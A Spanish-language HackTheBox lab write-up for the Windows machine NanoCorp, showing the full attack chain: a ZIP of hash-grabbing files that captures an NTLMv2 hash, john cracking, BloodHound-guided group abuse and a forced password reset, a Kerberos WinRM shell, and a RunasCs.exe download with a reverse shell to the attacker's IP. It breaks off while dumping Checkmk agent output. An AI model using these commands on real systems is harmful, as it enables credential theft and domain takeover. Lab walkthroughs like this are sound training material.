HackTheBox - NanoCorp

sckull — Fri, 26 Jun 2026 00:00:00 +0000

En NanoCorp se capturo el hash de un primer usuario con la carga de un archivo zip malicioso. Tras crackear el hash, se realizo una enumeracion de Active Directory con bloodhound, esto permitio identificar una ruta de explotacion para un segundo usuario. Se descubrio Check MK y una vulnerabilidad que afectaba a este software. Esta vulnerabilidad era explotable por el primer usuario por lo que se ejecuto RunasCs para obtener una shell inversa y, finalmente, tras su explotacion, se logro escalar privilegios.

Nombre	NanoCorp
OS	Windows
Puntos	40
Dificultad	Hard
Fecha de Salida	2025-11-08
IP	10.10.11.93
Maker	EmSec
Rated	{ "type": "bar", "data": { "labels": ["Cake", "VeryEasy", "Easy", "TooEasy", "Medium", "BitHard","Hard","TooHard","ExHard","BrainFuck"], "datasets": [{ "label": "User Rated Difficulty", "data": [123, 49, 280, 344, 532, 338, 505, 196, 63, 71], "backgroundColor": ["#9fef00","#9fef00","#9fef00", "#ffaf00","#ffaf00","#ffaf00","#ffaf00", "#ff3e3e","#ff3e3e","#ff3e3e"] }] }, "options": { "scales": { "xAxes": [{"display": false}], "yAxes": [{"display": false}] }, "legend": {"labels": {"fontColor": "white"}}, "responsive": true } }

Recon

nmap

nmap muestra multiples puertos abiertos: dns (53), kerberos (88), ldap (389), smb (445), winrm (5986).

# Nmap 7.95 scan initiated Sat Nov  8 14:54:07 2025 as: /usr/lib/nmap/nmap --privileged -p53,80,88,135,139,389,445,464,593,636,3268,3269,5986,9389,49664,49667,55897,62722,62726,62747 -sV -sC -oN nmap_scan 10.10.11.93
Nmap scan report for 10.10.11.93
Host is up (0.066s latency).

PORT      STATE SERVICE       VERSION
53/tcp    open  domain        (generic dns response: SERVFAIL)
| fingerprint-strings: 
|   DNS-SD-TCP: 
|     _services
|     _dns-sd
|     _udp
|_    local
80/tcp    open  http          Apache httpd 2.4.58 (OpenSSL/3.1.3 PHP/8.2.12)
|_http-server-header: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
|_http-title: Did not follow redirect to http://nanocorp.htb/
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2025-11-09 03:54:15Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: nanocorp.htb0., Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: nanocorp.htb0., Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
5986/tcp  open  ssl/http      Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=dc01.nanocorp.htb
| Subject Alternative Name: DNS:dc01.nanocorp.htb
| Not valid before: 2025-04-06T22:58:43
|_Not valid after:  2026-04-06T23:18:43
| tls-alpn: 
|_  http/1.1
|_http-server-header: Microsoft-HTTPAPI/2.0
9389/tcp  open  mc-nmf        .NET Message Framing
49664/tcp open  msrpc         Microsoft Windows RPC
49667/tcp open  msrpc         Microsoft Windows RPC
55897/tcp open  msrpc         Microsoft Windows RPC
62722/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
62726/tcp open  msrpc         Microsoft Windows RPC
62747/tcp open  msrpc         Microsoft Windows RPC
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port53-TCP:V=7.95%I=7%D=11/8%Time=690FAE05%P=x86_64-pc-linux-gnu%r(DNS-
SF:SD-TCP,30,"\0\.\0\0\x80\x82\0\x01\0\0\0\0\0\0\t_services\x07_dns-sd\x04
SF:_udp\x05local\0\0\x0c\0\x01");
Service Info: Hosts: nanocorp.htb, DC01; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time: 
|   date: 2025-11-09T03:55:09
|_  start_date: N/A
|_clock-skew: 7h00m01s
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat Nov  8 14:55:47 2025 -- 1 IP address (1 host up) scanned in 99.70 seconds

Agregamos a nuestro archivo /etc/hosts: nanocorp.htb, dc01.nanocorp.htb.

Web Site

Los headers del sitio muestran un servidor Apache y PHP 8.2.12.

❯ curl -sI nanocorp.htb
HTTP/1.1 200 OK
Date: Sun, 09 Nov 2025 03:56:33 GMT
Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
Last-Modified: Thu, 10 Apr 2025 06:27:08 GMT
ETag: "3f54-63266acdf17c3"
Accept-Ranges: bytes
Content-Length: 16212
Content-Type: text/html

❯

El sitio presenta una plantilla ‘corporativa’.

‘About us’ muestra un enlace para aplicar a posiciones laborales, muestra un subdominio hire.nanocorp.htb.

Directory Brute Forcing

feroxbuster muestra en el dominio unicamente contenido estatico.

❯ feroxbuster -u http://nanocorp.htb/ -w $CM
                                                                                                                                                                                        
 ___  ___  __   __     __      __         __   ___
|__  |__  |__) |__) | /  `    /  \ \_/ | |  \ |__
|    |___ |  \ |  \ | \__,    \__/ / \ | |__/ |___
by Ben "epi" Risher 🤓                 ver: 2.12.0
───────────────────────────┬──────────────────────
 🎯  Target Url            │ http://nanocorp.htb/
 🚀  Threads               │ 50
 📖  Wordlist              │ /usr/share/wordlists/dirb/common.txt
 👌  Status Codes          │ All Status Codes!
 💥  Timeout (secs)        │ 7
 🦡  User-Agent            │ feroxbuster/2.12.0
 💉  Config File           │ /etc/feroxbuster/ferox-config.toml
 🔎  Extract Links         │ true
 🏁  HTTP methods          │ [GET]
 🔃  Recursion Depth       │ 4
 🎉  New Version Available │ https://github.com/epi052/feroxbuster/releases/latest
───────────────────────────┴──────────────────────
 🏁  Press [ENTER] to use the Scan Management Menu™
──────────────────────────────────────────────────
404      GET        9l       33w      298c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
403      GET        9l       30w      301c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
200      GET       31l      253w    20439c http://nanocorp.htb/img/gallery-img-04-tn.jpg
200      GET       68l      298w    22111c http://nanocorp.htb/img/gallery-img-03-tn.jpg
200      GET      119l      179w     1776c http://nanocorp.htb/slick/slick.css
200      GET      221l      482w     6916c http://nanocorp.htb/js/main.js
200      GET       55l      246w    19495c http://nanocorp.htb/img/welcome-2.jpg
200      GET       13l       47w     5217c http://nanocorp.htb/img/welcome-1.jpg
200      GET      204l      307w     3145c http://nanocorp.htb/slick/slick-theme.css
200      GET       33l      353w    14420c http://nanocorp.htb/js/anime.min.js
200      GET        7l       49w     1227c http://nanocorp.htb/img/underline.png
200      GET       45l      246w    20681c http://nanocorp.htb/img/gallery-img-02-tn.jpg
200      GET      418l      699w     6148c http://nanocorp.htb/css/tooplate-style.css
200      GET       35l      239w    18731c http://nanocorp.htb/img/team.jpg
200      GET       32l      234w    19924c http://nanocorp.htb/img/gallery-img-01-tn.jpg
200      GET       32l      234w    19924c http://nanocorp.htb/img/gallery-img-05-tn.jpg
200      GET       47l      296w    26625c http://nanocorp.htb/img/gallery-img-06-tn.jpg
200      GET        5l       82w    33813c http://nanocorp.htb/fontawesome/css/fontawesome-all.min.css
200      GET      229l      670w    16212c http://nanocorp.htb/index.html
200      GET        1l      248w    42863c http://nanocorp.htb/slick/slick.min.js
200      GET        4l     1058w    69597c http://nanocorp.htb/js/jquery-3.2.1.slim.min.js
200      GET        7l     1516w   142181c http://nanocorp.htb/css/bootstrap.min.css
200      GET      229l      670w    16212c http://nanocorp.htb/
200      GET       12l       40w     8171c http://nanocorp.htb/img/Thumbs.db
200      GET      100l      178w     1756c http://nanocorp.htb/slick/slick.less
200      GET      100l      178w     1756c http://nanocorp.htb/slick/slick.scss
200      GET       61l      243w     6704c http://nanocorp.htb/slick/ajax-loader.gif
200      GET      194l      396w     4758c http://nanocorp.htb/slick/slick-theme.scss
200      GET      168l      324w     4181c http://nanocorp.htb/slick/slick-theme.less
200      GET       10l       24w      161c http://nanocorp.htb/slick/config.rb
200      GET       43l      334w    25834c http://nanocorp.htb/fontawesome/webfonts/fa-regular-400.woff
200      GET        7l       50w     2083c http://nanocorp.htb/slick/fonts/slick.ttf
200      GET       14l      328w     2152c http://nanocorp.htb/slick/fonts/slick.svg
200      GET        7l       38w     2217c http://nanocorp.htb/slick/fonts/slick.woff
200      GET        9l       55w     2247c http://nanocorp.htb/slick/fonts/slick.eot
200      GET      147l      867w    66659c http://nanocorp.htb/fontawesome/webfonts/fa-solid-900.woff2
200      GET      246l     1430w   113581c http://nanocorp.htb/fontawesome/webfonts/fa-brands-400.woff
200      GET     3004l     6913w    88454c http://nanocorp.htb/slick/slick.js
200      GET     1309l     5507w   109214c http://nanocorp.htb/fontawesome/webfonts/fa-brands-400.eot
200      GET     1309l     5499w   108970c http://nanocorp.htb/fontawesome/webfonts/fa-brands-400.ttf
200      GET      356l     1359w    35470c http://nanocorp.htb/fontawesome/webfonts/fa-regular-400.ttf
200      GET     1943l     5154w   113981c http://nanocorp.htb/fontawesome/webfonts/fa-solid-900.ttf
200      GET      161l     1011w    83920c http://nanocorp.htb/fontawesome/webfonts/fa-solid-900.woff
200      GET     1819l    10720w   864248c http://nanocorp.htb/img/pop-bg.jpg
200      GET     1944l     5163w   114204c http://nanocorp.htb/fontawesome/webfonts/fa-solid-900.eot
200      GET      224l     1206w    97742c http://nanocorp.htb/fontawesome/webfonts/fa-brands-400.woff2
200      GET       54l      296w    22164c http://nanocorp.htb/fontawesome/webfonts/fa-regular-400.woff2
200      GET      356l     1367w    35704c http://nanocorp.htb/fontawesome/webfonts/fa-regular-400.eot
200      GET      363l    12407w   106698c http://nanocorp.htb/fontawesome/webfonts/fa-regular-400.svg
200      GET     1413l    41226w   361397c http://nanocorp.htb/fontawesome/webfonts/fa-solid-900.svg
301      GET        9l       30w      334c http://nanocorp.htb/css => http://nanocorp.htb/css/
200      GET      990l    48097w   504454c http://nanocorp.htb/fontawesome/webfonts/fa-brands-400.svg
301      GET        9l       30w      334c http://nanocorp.htb/img => http://nanocorp.htb/img/
301      GET        9l       30w      333c http://nanocorp.htb/js => http://nanocorp.htb/js/
403      GET       11l       47w      420c http://nanocorp.htb/licenses
503      GET       11l       44w      401c http://nanocorp.htb/examples
403      GET       11l       47w      420c http://nanocorp.htb/server-info
403      GET       11l       47w      420c http://nanocorp.htb/server-status
❯

El archivo .rb no muestra ningun tipo de contenido relevante.

❯ curl http://nanocorp.htb/slick/config.rb
css_dir = "."
sass_dir = "."
images_dir = "."
fonts_dir = "fonts"
relative_assets = true

output_style = :compact
line_comments = false

preferred_syntax = :scss
❯

hire.nanocorp.htb

El subdominio muestra un formulario para el envio de curriculum en un archivo comprimido zip.

Directory Brute Forcing

El subdominio muestra contenido estatico.

❯ feroxbuster -u http://hire.nanocorp.htb/ -w $CM
                                                                                                                                                                                        
 ___  ___  __   __     __      __         __   ___
|__  |__  |__) |__) | /  `    /  \ \_/ | |  \ |__
|    |___ |  \ |  \ | \__,    \__/ / \ | |__/ |___
by Ben "epi" Risher 🤓                 ver: 2.12.0
───────────────────────────┬──────────────────────
 🎯  Target Url            │ http://hire.nanocorp.htb/
 🚀  Threads               │ 50
 📖  Wordlist              │ /usr/share/wordlists/dirb/common.txt
 👌  Status Codes          │ All Status Codes!
 💥  Timeout (secs)        │ 7
 🦡  User-Agent            │ feroxbuster/2.12.0
 💉  Config File           │ /etc/feroxbuster/ferox-config.toml
 🔎  Extract Links         │ true
 🏁  HTTP methods          │ [GET]
 🔃  Recursion Depth       │ 4
 🎉  New Version Available │ https://github.com/epi052/feroxbuster/releases/latest
───────────────────────────┴──────────────────────
 🏁  Press [ENTER] to use the Scan Management Menu™
──────────────────────────────────────────────────
404      GET        9l       33w      303c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
403      GET        9l       30w      306c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
301      GET        9l       30w      347c http://hire.nanocorp.htb/assets => http://hire.nanocorp.htb/assets/
200      GET        6l     2304w   232914c http://hire.nanocorp.htb/assets/css/bootstrap.min.css
301      GET        9l       30w      347c http://hire.nanocorp.htb/Images => http://hire.nanocorp.htb/Images/
301      GET        9l       30w      347c http://hire.nanocorp.htb/images => http://hire.nanocorp.htb/images/
200      GET       67l      179w     2520c http://hire.nanocorp.htb/index.html
200      GET       34l      208w    17984c http://hire.nanocorp.htb/Images/nanocorp.jpg
403      GET       11l       47w      425c http://hire.nanocorp.htb/licenses
503      GET       11l       44w      406c http://hire.nanocorp.htb/examples
200      GET       34l      208w    17984c http://hire.nanocorp.htb/images/nanocorp.jpg
200      GET       67l      179w     2520c http://hire.nanocorp.htb/
403      GET       11l       47w      425c http://hire.nanocorp.htb/server-info
403      GET       11l       47w      425c http://hire.nanocorp.htb/server-status
❯

User - web_svc

Creamos un archivo zip simple.

❯ touch file.txt
❯ zip file.zip file.txt
  adding: file.txt (stored 0%)
❯

Tras enviarlo este muestra que sera revisado.

NTLM Hash

Utilizamos hashgrab para generar archivos que nos ayuden a obtener el hash del usuario que esta revisando estos archivos. Creamos archivo zip con estos.

❯ python hashgrab.py 10.10.14.52 "nanocorp"
[*] Generating hash grabbing files..
[*] Written @nanocorp.scf
[*] Written @nanocorp.url
[*] Written nanocorp.library-ms
[*] Written desktop.ini
[*] Written lnk_697.ico
[+] Done, upload files to smb share and capture hashes with smbserver.py/responder
❯ ls
 @nanocorp.scf   @nanocorp.url   desktop.ini   hashgrab.py   nanocorp.library-ms   nanocorp.lnk   nanocorp.scf   nanocorp.url   skel.lnk
❯ zip file.zip @nanocorp.scf @nanocorp.url nanocorp.library-ms desktop.ini skel.lnk
  adding: @nanocorp.scf (deflated 10%)
  adding: @nanocorp.url (deflated 14%)
  adding: nanocorp.library-ms (deflated 50%)
  adding: desktop.ini (deflated 17%)
  adding: skel.lnk (deflated 85%)
❯

Ejecutamos responder, subimos el archivo zip y luego de varios segundos observamos el hash NTLM del usuario web_svc.

[+] Listening for events...

[SMB] NTLMv2-SSP Client   : 10.129.128.79
[SMB] NTLMv2-SSP Username : NANOCORP\web_svc
[SMB] NTLMv2-SSP Hash     : web_svc::NANOCORP:ced6ae74d9d52dd0:4AA2A8088C8B05ECCF4AFF22176250BF:010100000000000080C157A1C350DC010C0CC871BD3F208A000000000200080052004C005600490001001E00570049004E002D004A00300041004F0054004D00500055004B004500460004003400570049004E002D004A00300041004F0054004D00500055004B00450046002E0052004C00560049002E004C004F00430041004C000300140052004C00560049002E004C004F00430041004C000500140052004C00560049002E004C004F00430041004C000700080080C157A1C350DC0106000400020000000800300030000000000000000000000000200000894504F181F54A47CC45481650CD8AD1A0BDFADE757720156D964B0870AD5A2E0A001000000000000000000000000000000000000900200063006900660073002F00310030002E00310030002E00310034002E00350032000000000000000000
[*] Skipping previously captured hash for NANOCORP\web_svc
[*] Skipping previously captured hash for NANOCORP\web_svc
[*] Skipping previously captured hash for NANOCORP\web_svc
[*] Skipping previously captured hash for NANOCORP\web_svc
[*] Skipping previously captured hash for NANOCORP\web_svc
[*] Skipping previously captured hash for NANOCORP\web_svc

Cracking the Hash

Ejecutamos john con el wordlist rockyou.txt sobre el archivo de hash.

❯ john hash_web_svc --wordlist=$ROCK
Using default input encoding: UTF-8
Loaded 1 password hash (netntlmv2, NTLMv2 C/R [MD4 HMAC-MD5 32/64])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
dksehdgh712!@#   (web_svc)     
1g 0:00:00:00 DONE (2025-11-08 15:56) 1.515g/s 2811Kp/s 2811Kc/s 2811KC/s dobson5499..djcward
Use the "--show --format=netntlmv2" options to display all of the cracked passwords reliably
Session completed. 
❯

Bloodhound

Las credenciales son validas por smb y ldap.

❯ netexec smb nanocorp.htb -u web_svc -p 'dksehdgh712!@#'
SMB         10.129.128.79   445    DC01             [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:nanocorp.htb) (signing:True) (SMBv1:False) 
SMB         10.129.128.79   445    DC01             [+] nanocorp.htb\web_svc:dksehdgh712!@# 
❯ netexec ldap nanocorp.htb -u web_svc -p 'dksehdgh712!@#'
LDAP        10.129.128.79   389    DC01             [*] Windows Server 2022 Build 20348 (name:DC01) (domain:nanocorp.htb)
LDAP        10.129.128.79   389    DC01             [+] nanocorp.htb\web_svc:dksehdgh712!@# 
❯

Ejecutamos el modulo de bloodhound de netexec.

❯ netexec ldap nanocorp.htb -u web_svc -p 'dksehdgh712!@#' --bloodhound --collection All --dns-server 10.129.128.79
LDAP        10.129.128.79   389    DC01             [*] Windows Server 2022 Build 20348 (name:DC01) (domain:nanocorp.htb)
LDAP        10.129.128.79   389    DC01             [+] nanocorp.htb\web_svc:dksehdgh712!@# 
LDAP        10.129.128.79   389    DC01             Resolved collection methods: rdp, trusts, container, psremote, localadmin, acl, dcom, objectprops, group, session
LDAP        10.129.128.79   389    DC01             Done in 00M 15S
LDAP        10.129.128.79   389    DC01             Compressing output into /home/kali/.nxc/logs/DC01_10.129.128.79_2025-11-08_155950_bloodhound.zip
❯

Users

En el dominio existen cuatro usuarios.

Web_svc

El usuario web_svc puede agregarse a IT_SUPPORT y cambiar la contrasena a monitoring_svc a traves de este grupo.

Monitoring_svc

Es miembro de Remote Management Users y Protected Users. Esto significa que tiene acceso por WinRM pero con autenticacion Kerberos.

User - Monitoring_svc

Agregamos al usuario web_svc al grupo IT_SUPPORT y cambiamos la contrasena a monitoring_svc con bloodyAD.

❯ bloodyAD -d nanocorp.htb --host 10.129.128.79 -u web_svc -p 'dksehdgh712!@#' add groupMember IT_SUPPORT web_svc
[+] web_svc added to IT_SUPPORT
❯ bloodyAD -d nanocorp.htb --host 10.129.128.79 -u web_svc -p 'dksehdgh712!@#' set password monitoring_svc 'superpas123!@#'
[+] Password changed successfully!
❯

Generamos el archivo krb5.conf con netexec.

❯ netexec smb nanocorp.htb -u web_svc -p 'dksehdgh712!@#' --generate-krb5-file file.krb
SMB         10.129.128.79   445    DC01             [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:nanocorp.htb) (signing:True) (SMBv1:False) 
SMB         10.129.128.79   445    DC01             [+] nanocorp.htb\web_svc:dksehdgh712!@# 
❯ cat file.krb

[libdefaults]
    dns_lookup_kdc = false
    dns_lookup_realm = false
    default_realm = NANOCORP.HTB

[realms]
    NANOCORP.HTB = {
        kdc = dc01.nanocorp.htb
        admin_server = dc01.nanocorp.htb
        default_domain = nanocorp.htb
    }

[domain_realm]
    .nanocorp.htb = NANOCORP.HTB
    nanocorp.htb = NANOCORP.HTB
❯

Ejecutamos impacket-getTGT para obtener un ticket para monitoring_svc con las credenciales que asignamos.

❯ faketime "$(ntpdate -q nanocorp.htb | cut -d ' ' -f 1,2)" impacket-getTGT -dc-ip 10.129.128.79 nanocorp.htb/monitoring_svc:'superpas123!@#'
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies 

[*] Saving ticket in monitoring_svc.ccache
❯

Shell

Utilizamos winrmexec especificando el ticket, puerto y el modo ssl logrando obtener una shell y la flag user.txt.

❯ KRB5CCNAME=../files/monitoring_svc.ccache faketime "$(ntpdate -q nanocorp.htb | cut -d ' ' -f 1,2)" python winrmexec.py -port 5986 -ssl -k dc01.nanocorp.htb
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies 

[*] '-target_ip' not specified, using dc01.nanocorp.htb
[*] '-url' not specified, using https://dc01.nanocorp.htb:5986/wsman
[*] using domain and username from ccache: NANOCORP.HTB\monitoring_svc
[*] '-spn' not specified, using HTTP/dc01.nanocorp.htb@NANOCORP.HTB
[*] '-dc-ip' not specified, using NANOCORP.HTB
[*] requesting TGS for HTTP/dc01.nanocorp.htb@NANOCORP.HTB
PS C:\Users\monitoring_svc\Documents> whoami
nanocorp\monitoring_svc
PS C:\Users\monitoring_svc\Documents> cat ../Desktop/user.txt
90a1d5c219741c4ba65edee64d0df0a5
PS C:\Users\monitoring_svc\Documents>

# Commands
# web_svc to monitoring_svc
bloodyAD -d nanocorp.htb --host 10.129.128.79 -u web_svc -p 'dksehdgh712!@#' add groupMember IT_SUPPORT web_svc
bloodyAD -d nanocorp.htb --host 10.129.128.79 -u web_svc -p 'dksehdgh712!@#' set password monitoring_svc 'superpas124!@#'
faketime "$(ntpdate -q nanocorp.htb | cut -d ' ' -f 1,2)" impacket-getTGT -dc-ip 10.129.128.79 nanocorp.htb/monitoring_svc:'superpas123!@#'
KRB5CCNAME=monitoring_svc.ccache faketime "$(ntpdate -q nanocorp.htb | cut -d ' ' -f 1,2)" python winrmexec.py -port 5986 -ssl -k dc01.nanocorp.htb

User - web_svc

Ejecutamos una shell inversa con RunasCs especificando la credenciales de web_svc.

# Invoke-WebRequest -Uri "http://10.10.14.52/RunasCs.exe" -OutFile "C:/users/monitoring_svc/r.exe"
PS C:\> C:/users/monitoring_svc/r.exe web_svc 'dksehdgh712!@#' powershell.exe -r 10.10.14.52:1335

[+] Running in session 0 with process function CreateProcessWithLogonW()
[+] Using Station\Desktop: Service-0x0-185b1ff$\Default
[+] Async process 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' with pid 4032 created in background.
PS C:\>

Esto nos da acceso como web_svc.

❯ rlwrap nc -lvp 1335
listening on [any] 1335 ...
connect to [10.10.14.52] from nanocorp.htb [10.129.128.79] 58360
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.

Install the latest PowerShell for new features and improvements! https://aka.ms/PSWindows

PS C:\Windows\system32> whoami
nanocorp\web_svc
PS C:\Windows\system32>

Encontramos el ScheduledTasks script02.

PS C:\users\web_svc> Get-ScheduledTask | Select-Object TaskName, TaskPath, State | Format-Table -AutoSize

TaskName                                             TaskPath                                                          
--------                                             --------                                                          
script02                                             \                                                                 
StartApacheAsWebSvc                                  \                                                                 
Server Initial Configuration Task                    \Microsoft\Windows\                                               

# [... cut ...]                                     

PS C:\users\web_svc> Get-ScheduledTaskInfo -TaskName script02 


LastRunTime        : 11/8/2025 10:55:55 PM
LastTaskResult     : 0
NextRunTime        : 11/8/2025 10:56:56 PM
NumberOfMissedRuns : 0
TaskName           : script02
TaskPath           : 
PSComputerName     : 



PS C:\users\web_svc> (Get-ScheduledTask -TaskName script02).Actions


Id               : 
Arguments        : -NoProfile -ExecutionPolicy Bypass -File C:\Users\web_svc\Links\script_02.ps1
Execute          : powershell.exe
WorkingDirectory : 
PSComputerName   : 



PS C:\users\web_svc>

Esta ejecuta el script script_02.ps1 en donde observamos el uso de WinRAR para extraer los archivos ZIP que luego son abiertos con explorer.exe.

PS C:\users\web_svc> cat C:\Users\web_svc\Links\script_02.ps1
$uploadPath = "C:\xampp\htdocs\hire\uploads"
$extractTool = "C:\Program Files\WinRAR\WinRAR.exe"

# Get only .zip files
$zipFiles = Get-ChildItem "$uploadPath\*.zip" -File

foreach ($zip in $zipFiles) {
    # Create a random folder name for extraction
    $randomFolder = [System.IO.Path]::Combine($uploadPath, [System.IO.Path]::GetRandomFileName())
    New-Item -Path $randomFolder -ItemType Directory | Out-Null

    # Extract using WinRAR
    & "$extractTool" x -ibck "$($zip.FullName)" "$randomFolder\"

    # Open extracted folder
    $explorer = Start-Process explorer.exe -ArgumentList "`"$randomFolder`"" -PassThru

    # Wait 5 seconds
    Start-Sleep -Seconds 5

    # Kill only the explorer window opened
    try {
        $explorer | Stop-Process -Force
    } catch {
        Write-Host "Explorer already closed or failed to stop."
    }

    # Delete the temp folder
    Remove-Item -Path $randomFolder -Recurse -Force
    Remove-Item -Path $zip.FullName -Force

    Write-Host "Done with: $($zip.Name)`n"
}
PS C:\users\web_svc>

Checkmk

Encontramos checkmk una herramienta de monitoreo. En Program Files (x86) no tenemos permisos de acceso.

PS C:\Program Files (x86)\checkmk> dir -force
dir -force


    Directory: C:\Program Files (x86)\checkmk


Mode                 LastWriteTime         Length Name                                                                 
----                 -------------         ------ ----                                                                 
d-----          4/5/2025   4:42 PM                service                                                              


PS C:\Program Files (x86)\checkmk> icacls service
icacls service
service: Access is denied.
Successfully processed 0 files; Failed processing 1 files
PS C:\Program Files (x86)\checkmk>

Sin embargo en ProgramData logramos el acceso a ciertos archivos. En uno de estos se define el puerto del agente 6556, este esta abierto local y externamente.

PS C:\programdata\checkmk\agent> dir


    Directory: C:\programdata\checkmk\agent


Mode                 LastWriteTime         Length Name                                                                 
----                 -------------         ------ ----                                                                 
d-----          4/5/2025   4:17 PM                backup                                                               
d-----          4/5/2025   4:17 PM                bakery                                                               
d-----         1/16/2026   4:38 AM                bin                                                                  
d-----          4/5/2025   4:17 PM                config                                                               
d-----          4/5/2025   4:17 PM                install                                                              
d-----          4/5/2025   4:17 PM                local                                                                
d-----          4/5/2025   3:03 PM                log                                                                  
d-----          4/5/2025   4:17 PM                modules                                                              
d-----          4/5/2025   4:17 PM                mrpe                                                                 
d-----          4/5/2025   4:17 PM                plugins                                                              
d-----          4/5/2025   4:17 PM                spool                                                                
d-----          4/5/2025   4:17 PM                state                                                                
d-----          4/5/2025   4:17 PM                tmp                                                                  
d-----          4/5/2025   4:17 PM                update                                                               
-a----          4/5/2025   3:03 PM             24 allow-legacy-pull                                                    
-a----          6/7/2022   9:39 AM          16906 check_mk.user.example.yml                                            
-a----          6/7/2022   9:39 AM          16906 check_mk.user.yml                                                    
-a----         1/16/2026   4:38 AM            180 cmk-agent-ctl.toml                                                   
-a----          4/5/2025   4:17 PM             24 controller-flag                                                      


PS C:\programdata\checkmk\agent> cat cmk-agent-ctl.toml 
# Controlled by Check_MK Agent Bakery.
# This file is managed via WATO, do not edit manually or you
# lose your changes next time when you update the agent.

pull_port = 6556
PS C:\programdata\checkmk\agent> netstat -ano | findstr 6556
  TCP    0.0.0.0:6556           0.0.0.0:0              LISTENING       3984
  TCP    [::]:6556              [::]:0                 LISTENING       3984
PS C:\programdata\checkmk\agent>

Si realizamos una conexion con netcat a este puerto, nos devuelve informacion sobre la maquina, procesos, servicios, entre otros. En este observamos la version de checkmk 2.1.0p10 BuildDate Aug 19 2022.

❯ nc nanocorp.htb 6556
<<<check_mk>>>
Version: 2.1.0p10
BuildDate: Aug 19 2022
AgentOS: windows
Hostname: DC01
Architecture: 64bit
WorkingDirectory: C:\Windows\system32
ConfigFile: C:\Program Files (x86)\checkmk\service\check_mk.yml
LocalConfigFile: C:\ProgramData\checkmk\agent\check_mk.user.yml
AgentDirectory: C:\Program Files (x86)\checkmk\service
PluginsDirectory: C:\ProgramData\checkmk\agent\plugins
StateDirectory: C:\ProgramData\checkmk\agent\state
ConfigDirectory: C:\ProgramData\checkmk\agent\config
TempDirectory: C:\ProgramData\checkmk\agent\tmp
LogDirectory: C:\ProgramData\checkmk\agent\log
SpoolDirectory: C:\ProgramData\checkmk\agent\spool
LocalDirectory: C:\ProgramData\checkmk\agent\local
OnlyFrom: 
<<<cmk_agent_ctl_status:sep(0)>>>
{"version":"2.1.0p10","agent_socket_operational":true,"ip_allowlist":[],"allow_legacy_pull":true,"connections":[]}
<<<wmi_cpuload:sep(124)>>>
[system_perf]
Name|ProcessorQueueLength|Timestamp_PerfTime|Frequency_PerfTime|WMIStatus
|0|293565971037|10000000|OK
[computer_system]
Name|NumberOfLogicalProcessors|NumberOfProcessors|WMIStatus
DC01|2|1|OK
<<<uptime>>>
29356
<<<mem>>>
MemTotal:      4193312 kB
MemFree:       1912776 kB
SwapTotal:     1441792 kB
SwapFree:      1647384 kB
PageTotal:     5635104 kB
PageFree:      3560160 kB
VirtualTotal:  137438953344 kB
VirtualFree:   137434635168 kB
<<<fileinfo:sep(124)>>>
1762926150
<<<df:sep(9)>>>
C:\	NTFS	22298620	17611764	4686856	79%	C:\
<<<winperf_phydisk>>>
1762926150.93 234 10000000
2 instances: 0_C: _Total
-36 0 0 rawcount
-34 36408215003 36408215003 type(20570500)
-34 134073997509273041 134073997509273041 type(40030500)
1166 36408215003 36408215003 type(550500)
-32 26891695405 26891695405 type(20570500)
-32 134073997509273041 134073997509273041 type(40030500)
1168 26891695405 26891695405 type(550500)
-30 9516519598 9516519598 type(20570500)
-30 134073997509273041 134073997509273041 type(40030500)
1170 9516519598 9516519598 type(550500)
-28 2048476635 2048476635 average_timer
-28 591967 591967 average_base
-26 1121891629 1121891629 average_timer
-26 445390 445390 average_base
-24 926585006 926585006 average_timer
-24 146577 146577 average_base
-22 591967 591967 counter
-20 445390 445390 counter
-18 146577 146577 counter
-16 22306593792 22306593792 bulk_count
-14 19136152576 19136152576 bulk_count
-12 3170441216 3170441216 bulk_count
-10 22306593792 22306593792 average_bulk
-10 591967 591967 average_base
-8 19136152576 19136152576 average_bulk
-8 445390 445390 average_base
-6 3170441216 3170441216 average_bulk
-6 146577 146577 average_base
1248 275528287441 275528287441 type(20570500)
1248 134073997509273041 134073997509273041 type(40030500)
1250 10408 10408 counter
<<<winperf_if>>>
1762926150.94 510 10000000
1 instances: vmxnet3_Ethernet_Adapter
-122 27078369 bulk_count
-110 216814 bulk_count
-244 201648 bulk_count
-58 15166 bulk_count
10 10000000000 large_rawcount
-246 23293205 bulk_count
14 13447 bulk_count
16 188201 bulk_count
18 0 large_rawcount
20 0 large_rawcount
22 0 large_rawcount
-4 3785164 bulk_count
26 12119 bulk_count
28 3047 bulk_count
30 0 large_rawcount
32 0 large_rawcount
34 0 large_rawcount
1086 0 large_rawcount
1088 0 large_rawcount
1090 10 bulk_count
1092 0 bulk_count
1094 2484 large_rawcount
<<<winperf_processor>>>
1762926150.95 238 10000000
3 instances: 0 1 _Total
